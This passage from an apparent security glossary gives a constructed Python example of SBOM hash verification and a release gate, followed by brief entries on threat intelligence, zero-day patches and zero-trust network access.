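An added Python example, not from the course, of SBOM‑based provenance checking as mentioned here and under Supply Chain Attack: the SHA‑256 recorded for each component in a constructed CycloneDX‑style document is compared with the bytes actually fetched, and a release gate fails on mismatches or unpinned components. Component names, versions and artifact bytes are constructed.

```python
import hashlib
import json


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed artifacts as fetched from a package mirror, keyed "name@version"
ARTIFACTS = {
    "libfoo@1.4.2": b"libfoo-1.4.2 release tarball (constructed bytes)",
    "parser-util@0.9.0": b"parser-util-0.9.0 wheel (constructed bytes)",
    "netlib@2.0.1": b"netlib-2.0.1 tarball (constructed bytes, tampered on the mirror)",
}

# Constructed CycloneDX-style SBOM (same field names CycloneDX uses for components and hashes).
# netlib's recorded hash is for the genuine release, which the mirror did not serve; leftpad has no hash.
SBOM = json.dumps({
    "bomFormat": "CycloneDX",
    "components": [
        {"name": "libfoo", "version": "1.4.2",
         "hashes": [{"alg": "SHA-256", "content": sha256(b"libfoo-1.4.2 release tarball (constructed bytes)")}]},
        {"name": "parser-util", "version": "0.9.0",
         "hashes": [{"alg": "SHA-256", "content": sha256(b"parser-util-0.9.0 wheel (constructed bytes)")}]},
        {"name": "netlib", "version": "2.0.1",
         "hashes": [{"alg": "SHA-256", "content": sha256(b"netlib-2.0.1 tarball (constructed bytes)")}]},
        {"name": "leftpad", "version": "3.1.0"},
    ],
})


def verify_sbom(sbom_json: str, artifacts: dict) -> dict:
    """Compare each component's recorded SHA-256 with the bytes actually obtained.
    Statuses: ok, mismatch (possible tampering), unpinned (SBOM gives no hash), missing (not fetched)."""
    report = {}
    for comp in json.loads(sbom_json)["components"]:
        key = f'{comp["name"]}@{comp["version"]}'
        expected = [h["content"] for h in comp.get("hashes", []) if h["alg"] == "SHA-256"]
        if not expected:
            report[key] = "unpinned"
        elif key not in artifacts:
            report[key] = "missing"
        elif sha256(artifacts[key]) in expected:
            report[key] = "ok"
        else:
            report[key] = "mismatch"
    return report


def release_gate(report: dict, allow_unpinned: bool = False) -> bool:
    """Fail the build on any mismatch or missing artifact; unpinned components fail unless waived."""
    blocking = {"mismatch", "missing"} | (set() if allow_unpinned else {"unpinned"})
    return not any(status in blocking for status in report.values())
```

A hash check only proves that what you fetched is what the SBOM author hashed; it says nothing about whether that author’s build was itself compromised. Signature verification of the SBOM and of the artifacts closes the rest of the loop, which is why the entry lists code signing alongside SBOM verification.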

Threat Intelligence

Threat intelligence provides contextual information about adversaries, their mot…

It can be strategic (geopolitical trends), tactical (IoCs), or operational (specific attack plans). Organizations ingest feeds to enrich SIEM alerts and prioritize patches. However, the sheer volume of data can overwhelm analysts, and inaccurate intelligence may lead to misdirected defenses.

Zero‑Day Patch

A zero‑day patch is an emergency software update released to fix a critical vuln…

Vendors may issue a zero‑day patch outside normal release cycles, as seen with the “Log4Shell” vulnerability. Rapid deployment is essential, yet many organizations lack automated patching pipelines, leading to delayed remediation and extended exposure.

Zero‑Trust Network Access (ZTNA)

ZTNA replaces traditional VPNs by granting access to applications based on verif…

Users only see the resources they are authorized for, reducing attack surface. A practical deployment uses a cloud‑based ZTNA broker that authenticates users before connecting them to internal services. Integration with legacy applications can be complex, and performance latency may arise due to additional authentication hops.
